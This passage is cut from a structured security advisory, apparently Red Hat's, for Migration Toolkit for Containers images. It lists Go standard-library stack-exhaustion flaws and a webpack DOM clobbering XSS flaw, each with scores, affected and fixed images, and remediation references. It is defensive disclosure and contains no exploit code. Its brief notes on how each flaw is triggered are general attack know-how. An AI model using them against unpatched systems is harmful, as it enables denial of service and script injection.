"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", }, { cve: "CVE-2024-34156", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:09.377905+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310528", }, ], notes: [ { category: "description", text: "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.", title: "Vulnerability description", }, { category: "summary", text: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in Go's `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34156", }, { category: "external", summary: "RHBZ#2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34156", url: "https://www.cve.org/CVERecord?id=CVE-2024-34156", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", }, { category: "external", summary: "https://go.dev/cl/611239", url: "https://go.dev/cl/611239", }, { category: "external", summary: "https://go.dev/issue/69139", url: "https://go.dev/issue/69139", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3106", url: "https://pkg.go.dev/vuln/GO-2024-3106", }, ], release_date: "2024-09-06T21:15:12.020000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-34158", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2024-09-06T21:20:12.126400+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310529", }, ], notes: [ { category: "description", text: "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34158", }, { category: "external", summary: "RHBZ#2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34158", url: "https://www.cve.org/CVERecord?id=CVE-2024-34158", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", }, { category: "external", summary: "https://go.dev/cl/611240", url: "https://go.dev/cl/611240", }, { category: "external", summary: "https://go.dev/issue/69141", url: "https://go.dev/issue/69141", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3107", url: "https://pkg.go.dev/vuln/GO-2024-3107", }, ], release_date: "2024-09-06T21:15:12.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", 